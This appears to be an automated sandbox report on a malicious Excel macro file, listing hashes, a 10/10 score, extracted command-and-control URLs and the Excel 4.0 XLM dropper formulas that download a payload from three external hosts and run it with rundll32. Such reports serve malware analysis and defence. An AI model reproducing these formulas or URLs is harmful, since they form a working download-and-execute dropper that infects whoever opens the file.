General

  • Target

    test.xlsm

  • Size

    83KB

  • Sample

    230327-tvjt1agd2s

  • MD5

    8fbf9860fb4875112772af77f004da67

  • SHA1

    fd4b875e7c386e3321a623a3bf8e2d0c13d79d8a

  • SHA256

    66676f6cb631e7ff6a516495a780afcf23189458176b5ec68addb9f1395289e6

  • SHA512

    f7a5dfc21723b55440b8f4f310e954bb6d4088314838cb75e5f9c54dbb10d7f5f251aeb742717cde1d12ad922b9e9bb37e7145145e05bc53f1ef5c8c20e1c4f2

  • SSDEEP

    1536:Xycd7LWsqxG/+CbEcWeu3XDXeoiHwt/uE1d7mT6SrPag3HtQVASgVU:ii32G/+CbE9H78wt2E1d7e6STa6Sx

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/

http://ostadsarma.com/wp-admin/JNgASjNC/

http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/","..\erum.ocx",0,0)
    =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ostadsarma.com/wp-admin/JNgASjNC/","..\erum.ocx",0,0))
    =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/","..\erum.ocx",0,0))
    =IF('EWDFFEFAD'!E22<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")
    =RETURN()

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/

    http://ostadsarma.com/wp-admin/JNgASjNC/

    http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/


MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion

    Modify Registry (T1112): 1

  • Discovery

    Query Registry (T1012): 3

    System Information Discovery (T1082): 2

Tasks